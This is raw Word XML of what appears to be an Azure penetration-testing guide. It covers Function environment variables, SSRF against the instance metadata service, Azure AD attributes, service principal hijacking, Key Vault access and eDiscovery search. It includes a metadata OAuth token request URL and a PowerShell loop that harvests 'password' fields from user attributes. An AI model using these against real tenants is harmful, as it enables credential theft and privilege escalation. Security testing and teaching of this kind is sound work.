    <w:p w14:paraId="4E4ED0D2" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Access via Reader Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: Accounts with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> access to Azure Functions can still view these environment variables. Exploiting this can provide sensitive information, such as API keys or database credentials, aiding in further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADF130" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation Opportunity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: If secrets or sensitive data are stored inappropriately in the environment variables or source code, these can be extracted during an engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AA3AA" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Instance Metadata Service (IMDS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3599CE" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose and Accessibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Azure, like other cloud providers, uses an instance metadata service (IMDS) for cloud instances to retrieve essential information about their environment (e.g., instance identity, tokens, etc.). It's hosted at a non-routable IP (169.254.169.254), and ideally should only be accessible from the localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A6726" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: If the server is compromised or there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> vulnerabilities, remote attackers could access the metadata endpoint, potentially exposing sensitive credentials or tokens used by the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05340BA1" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Token Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: The metadata endpoint can provide OAuth tokens used for accessing Azure resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AEC57A" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t>http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAB6AF" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Test for SSRF vulnerabilities or misconfigurations that allow an attacker to query this metadata service remotely and extract access tokens or other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F177E" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Azure AD User Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54EDEE" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sensitive Data in User Attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Azure Active Directory (Azure AD) user attributes may contain sensitive data, such as credentials stored in description fields or comments. Penetration testers should investigate these attributes for potential password leakage or other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17387CEF" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script to Search User Attributes for Passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: You can use PowerShell to search Azure AD user attributes for any fields that may contain passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D9C83" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">$users = Get-MsolUser; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A3691" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t>foreach($user in $users){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC1E96" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">    $props = @();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358E2607" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">    $user | Get-Member | foreach-object{$props+=$_.Name}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955A39A" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">    foreach($prop in $props){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572023E" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">        if($user.$prop-like "*password*"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CCE050" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">            Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC62417" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B638E0C" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D60C4" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74860329" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Scanning user attributes for potential passwords or credentials is a valuable tactic to find misconfigurations or careless security practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434326E" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Service Principal Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F8D96" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default Service Principals</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: Azure Active Directory (AAD) has over 200 default service principals in an Office 365 tenant, none of which are visible in the Azure GUI portal. These service principals often have varying levels of permissions via </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45679559" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: An </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> can change passwords or certificates associated with service principals, including default ones. This means a compromised Application Admin role could lead to the hijacking of service principals, giving an attacker elevated privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D959DD" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Gaining access to the Application Administrator role can lead to service principal hijacking, allowing an attacker to escalate privileges or access sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5947A7" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Azure Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EBFBD" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vault for Storing Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: Azure Key Vault is used to store and manage secrets like passwords, API keys, and SSL/TLS certificates. While access to Key Vaults is restricted, users with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contributor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> roles or higher on the Key Vault can access its secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE890F" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: By default, only the owner of a Key Vault can access the stored secrets. However, users with Contributor roles over the Key Vault can elevate their own access to retrieve secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCBE4C" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: If you have access to a Contributor or higher role on a Key Vault, you can retrieve sensitive data like database credentials or certificates, which can be critical for lateral movement or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD25C7" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Microsoft 365 Compliance Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F17AA" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t>: Microsoft 365 Compliance Search allows security administrators to search and report on data across Microsoft 365 services such as Exchange email, SharePoint sites, Teams messages, and OneDrive accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B9C77" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Required Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: To use Compliance Search, an account must be a member of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eDiscovery Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> role group within the Security &amp; Compliance Center. This role grants access to search across the entire Microsoft 365 suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE548E" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation Opportunity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: If an attacker gains access to an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eDiscovery Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> or similar role, they can search through large volumes of organizational data, potentially uncovering sensitive information (e.g., emails, documents, communications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE7E76" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:r>
        <w:pict w14:anchorId="78EFDC1C">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B465B85" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:r w:rsidRPr="00D60277">
        <w:t>By focusing on these serverless environments, metadata services, Azure AD configurations, and key vaults, a penetration tester can identify areas of weakness, misconfigurations, or improper access control that can lead to significant security breaches in an Azure environment. Exploiting these vulnerabilities can provide further access or escalate privileges, making them key areas of investigation during an Azure PenTest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531E863" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8"/>
    <w:p w14:paraId="46AD0D75" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8"/>
    <w:p w14:paraId="77EA2621" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:r w:rsidRPr="00B1707A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17976156" wp14:editId="257DE268">
            <wp:extent cx="6325148" cy="3063505"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="35577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72896" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6325148" cy="3063505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5BE04" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8"/>
    <w:p w14:paraId="79178D5F" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8"/>
    <w:p w14:paraId="71BC0298" w14:textId="77777777" w:rsidR="00F41B33" w:rsidRDefault="00F41B33"/>
    <w:sectPr w:rsidR="00F41B33"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4531"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="518A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A0642"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EF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60058"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACC46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49665D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9F4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73E57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97B0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C6D2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09DE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F67F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEFE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404EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8370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D2C85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AB0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B51766"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C85E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4492D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBE8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54B36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A26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7A7E91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A02C4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386739">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2063139753">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="802844577">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="44376704">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1430390735">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="722946369">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1606882211">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1825006913">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2144499891">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="245454577">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="693925139">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="228347898">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="829164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62E"/>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33C8"/>
    <w:rsid w:val="00184D18"/>
    <w:rsid w:val="00187466"/>
    <w:rsid w:val="001924F6"/>
    <w:rsid w:val="0019345C"/>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5BAF"/>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1A2F"/>
    <w:rsid w:val="00372A1E"/>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24475"/>
    <w:rsid w:val="004324EE"/>
    <w:rsid w:val="004421AF"/>
    <w:rsid w:val="00446563"/>
    <w:rsid w:val="00453E91"/>
    <w:rsid w:val="004577F4"/>
    <w:rsid w:val="0046162E"/>
    <w:rsid w:val="0046272A"/>
    <w:rsid w:val="00467BB1"/>
    <w:rsid w:val="00467CE3"/>
    <w:rsid w:val="004751E9"/>
    <w:rsid w:val="004A186E"/>
    <w:rsid w:val="004B3933"/>
    <w:rsid w:val="004B6BA7"/>
    <w:rsid w:val="004B6C74"/>
    <w:rsid w:val="004C4322"/>
    <w:rsid w:val="004C7D0F"/>
    <w:rsid w:val="004E1315"/>
    <w:rsid w:val="004F4E03"/>
    <w:rsid w:val="0050563B"/>
    <w:rsid w:val="0051626A"/>
    <w:rsid w:val="005245D1"/>
    <w:rsid w:val="0053490A"/>
    <w:rsid w:val="00553BC6"/>
    <w:rsid w:val="00554715"/>
    <w:rsid w:val="00556196"/>
    <w:rsid w:val="00557F08"/>
    <w:rsid w:val="005603E5"/>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A39"/>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39C"/>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157C"/>
    <w:rsid w:val="00A67CE2"/>
    <w:rsid w:val="00A878A6"/>
    <w:rsid w:val="00A90A9E"/>
    <w:rsid w:val="00A97760"/>
    <w:rsid w:val="00A9797E"/>
    <w:rsid w:val="00AA4905"/>
    <w:rsid w:val="00AA6275"/>
    <w:rsid w:val="00AB044C"/>
    <w:rsid w:val="00AB1927"/>
    <w:rsid w:val="00AB56F9"/>
    <w:rsid w:val="00AB5722"/>
    <w:rsid w:val="00AB63BE"/>
    <w:rsid w:val="00AB75B3"/>
    <w:rsid w:val="00AC2559"/>
    <w:rsid w:val="00AC37D7"/>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0AE9"/>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594D"/>
    <w:rsid w:val="00EB6161"/>
    <w:rsid w:val="00EB69DE"/>
    <w:rsid w:val="00ED7608"/>
    <w:rsid w:val="00EE787A"/>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D895B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{54B18963-C5A2-48EB-808D-5245BB97D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BAF"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
